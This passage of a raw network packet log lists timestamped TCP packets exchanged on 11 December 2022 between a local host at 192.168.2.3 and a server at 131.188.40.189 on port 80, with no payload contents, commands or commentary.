                          Dec 11, 2022 09:25:55.005331993 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005338907 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005366087 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005388975 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005399942 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005434036 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005445004 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005467892 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005501986 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005506039 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005537033 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005556107 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005570889 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005603075 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005636930 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005647898 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005670071 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005703926 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005705118 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005748987 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005779982 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005783081 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005816936 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005860090 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005884886 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005896091 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005929947 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005961895 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.005979061 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.005995989 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006001949 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.006030083 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006063938 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006108999 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006131887 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.006160975 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006233931 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006241083 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.006274939 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006310940 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006342888 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.006344080 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006377935 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006419897 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006454945 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006491899 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006499052 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.006521940 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006555080 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006570101 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.006588936 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006618977 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.006623030 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006658077 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006690979 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006702900 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.006726027 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006758928 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006793976 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006827116 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006829977 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.006829977 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.006866932 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006915092 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006947994 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.006983042 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007004976 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007016897 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007051945 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007055044 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007086039 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007117987 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007136106 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007152081 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007186890 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007193089 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007220984 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007253885 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007287979 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007297993 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007322073 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007354021 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007388115 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007391930 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007422924 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007456064 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007489920 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007519007 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007523060 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007556915 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007585049 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007590055 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007622957 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007672071 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007705927 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007740021 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007745981 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007772923 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007806063 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007852077 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007855892 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007889986 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007925034 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007941008 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007958889 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.007968903 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.007993937 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008027077 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008059978 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008085966 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.008094072 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008121967 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.008127928 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008160114 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008174896 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.008193970 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008240938 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008263111 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.008275032 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008310080 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008313894 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.008344889 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008378029 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008420944 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008454084 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008461952 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.008487940 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008531094 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008564949 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008606911 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008634090 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.008641005 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008675098 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008717060 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008738041 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.008750916 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008785963 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008826971 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008846045 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.008861065 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008893967 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008896112 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.008940935 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008960009 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008992910 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.008994102 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.009020090 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.009027004 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.009059906 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.009102106 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.009135008 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.009181023 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.009186983 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.009288073 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.029253006 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029315948 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029351950 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029386044 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029412985 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.029431105 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029450893 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.029469013 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029504061 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029546022 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029566050 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.029580116 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029618979 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029635906 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.029647112 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029683113 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.029684067 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029711962 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029747009 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029759884 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.029783010 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029824972 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029859066 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029894114 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029896021 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.029928923 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029963970 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.029998064 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030004978 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030031919 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030066013 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030107975 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030133963 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030141115 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030175924 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030200005 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030210018 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030244112 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030276060 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030304909 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030308962 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030342102 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030388117 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030420065 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030453920 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030477047 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030488014 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030524015 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030527115 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030556917 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030590057 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030594110 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030623913 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030657053 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030698061 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030721903 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030733109 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030766964 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030808926 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030833960 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030843973 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030900002 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030926943 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030951023 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.030968904 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.030986071 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031030893 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031059027 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.031059980 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031094074 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031126022 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031172991 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031194925 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.031207085 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031239986 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031272888 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031275034 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.031306982 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031330109 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.031351089 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031394958 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031428099 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031474113 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031503916 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.031507015 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031541109 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031583071 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031605959 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.031616926 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031660080 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031685114 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.031694889 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031729937 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031771898 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031805038 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031822920 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.031847954 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031868935 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.031882048 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031914949 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031955957 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.031979084 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.031989098 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032022953 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032063961 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032084942 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.032097101 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032130003 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032175064 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032196045 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.032208920 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032241106 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032284021 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032306910 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.032318115 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032351971 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032392979 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032414913 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.032427073 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032459021 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032501936 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032521963 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.032536983 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032568932 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032613039 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.032630920 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.032644987 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.033341885 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.280713081 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.280791998 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:55.752965927 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:55.754667044 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.051403999 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.071665049 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.071724892 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.071768999 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.071810961 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.071856976 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.071899891 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.071898937 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.071943998 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.071962118 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.071989059 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.072031975 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.072058916 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.072077036 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.072141886 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.092514038 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.092578888 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.092623949 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.092668056 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.092664957 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.092711926 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.092756987 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.092777014 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.092803001 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.092845917 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.092890024 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.092911959 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.092911959 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.092936039 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.092979908 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.093023062 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.093051910 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.093066931 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.093077898 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.093112946 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.093158007 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.093210936 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.093228102 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.093257904 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.093277931 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.093302011 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.093344927 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.093363047 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.093403101 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.093466997 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.113415956 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113481998 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113529921 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113573074 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113625050 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113646984 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.113667965 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113713980 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113724947 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.113725901 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.113759041 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113802910 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113847971 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113869905 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.113894939 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113938093 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.113981009 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.114013910 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.114026070 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.114068985 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.114090919 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.114104986 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.114146948 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.114165068 CET4971980192.168.2.3131.188.40.189
                          Dec 11, 2022 09:25:56.114192009 CET8049719131.188.40.189192.168.2.3
                          Dec 11, 2022 09:25:56.114242077 CET8049719131.188.40.189192.168.2.3
